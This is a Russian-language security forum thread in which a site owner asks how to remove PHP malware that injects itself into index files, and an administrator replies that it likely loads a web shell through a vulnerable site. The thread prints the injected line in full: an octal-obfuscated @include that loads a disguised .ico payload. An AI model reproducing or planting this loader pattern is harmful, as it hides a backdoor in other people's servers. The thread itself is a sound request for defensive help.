• B правой части каждого сообщения есть стрелки и . Не стесняйтесь оценивать ответы. Чтобы автору вопроса закрыть свой тикет, надо выбрать лучший ответ. Просто нажмите значок в правой части сообщения.

  • 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Проблема с вредоносным кодом PHP, который сам встраивается

Кирилл Цицорин

Кирилл Цицорин

New member
15.08.2022
2
0
BIT
0
Всем доброго времени суток. Прошу знающих подсказать, как бороться с данной патологией ибо Я сам очень далек от ИБ.
Дело в том, что в один момент, полгода назад на сервере появились подозрительные файлы расширения .php и .ico.
Файлы php имели названия из набора латинских букв. Но самое неудобное, что во все индексы встраивается вот этот код:
PHP: 
/*51ceb*/

@include "\057var\057www\057kir\151ll/\144ot.\155edk\162mu/\146las\153/up\154oad\163/96\06141/\0568f0\06373d\067.ic\157";

/*51ceb*/
imagee_2022-08-15_15-18-49.png


Вот сами файлы.

Подскажитее как решить проблему, пожалуйста.
 
Сортировать по дате Сортировать по голосам
Кирилл Цицорин

Кирилл Цицорин

New member
15.08.2022
2
0
BIT
0
За 0 Против
larchik

larchik

Администратор
07.06.2019
364
415
BIT
144
Кирилл Цицорин сказал(а):
Всем доброго времени суток. Прошу знающих подсказать, как бороться с данной патологией ибо Я сам очень далек от ИБ.
Дело в том, что в один момент, полгода назад на сервере появились подозрительные файлы расширения .php и .ico.
Файлы php имели названия из набора латинских букв. Но самое неудобное, что во все индексы встраивается вот этот код:
PHP: 
/*51ceb*/

@include "\057var\057www\057kir\151ll/\144ot.\155edk\162mu/\146las\153/up\154oad\163/96\06141/\0568f0\06373d\067.ic\157";

/*51ceb*/
Посмотреть вложение 62392

Вот сами файлы.

Подскажитее как решить проблему, пожалуйста.
Нажмите, чтобы раскрыть...
Привет. Похоже на то, что встраиваемый код включает какой-то файл по пути /var/www/kiril/.../flask/uploads/96141/.8f0373d7.ico
Вероятно этот самый файл - полезная нагрузка (вебшелл или еще что-то). Это говорит о том, что сервер уязвим (скорее всего сам сайт). Следовательно, чтобы решить проблему, надо найти уязвимость и устранить ее.

Кирилл Цицорин сказал(а):
если бы у нас был бюджет то обратились бы)
Нажмите, чтобы раскрыть...
Поэтому бюджет нужен.

Ты не одинок, тут по тексту описана эта проблема:
Ссылка скрыта от гостей

Направление, в какую сторону копать, у тебя есть.
 
Последнее редактирование:
За 1 Против
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ